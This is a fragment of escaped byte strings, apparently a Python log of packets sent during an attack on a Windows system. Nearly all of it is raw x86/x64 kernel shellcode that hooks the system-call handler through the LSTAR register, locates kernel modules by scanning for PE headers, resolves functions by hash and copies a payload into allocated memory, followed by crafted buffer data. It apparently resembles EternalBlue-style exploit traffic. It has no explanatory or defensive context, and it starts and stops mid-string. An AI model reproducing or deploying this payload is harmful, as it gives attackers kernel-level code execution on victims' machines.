\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\xc0@\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\xe9@\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\r@\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\xc0@\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\x8b@\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\x8b@<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\xc0@\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\x01@\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 5, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\xc0@\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea 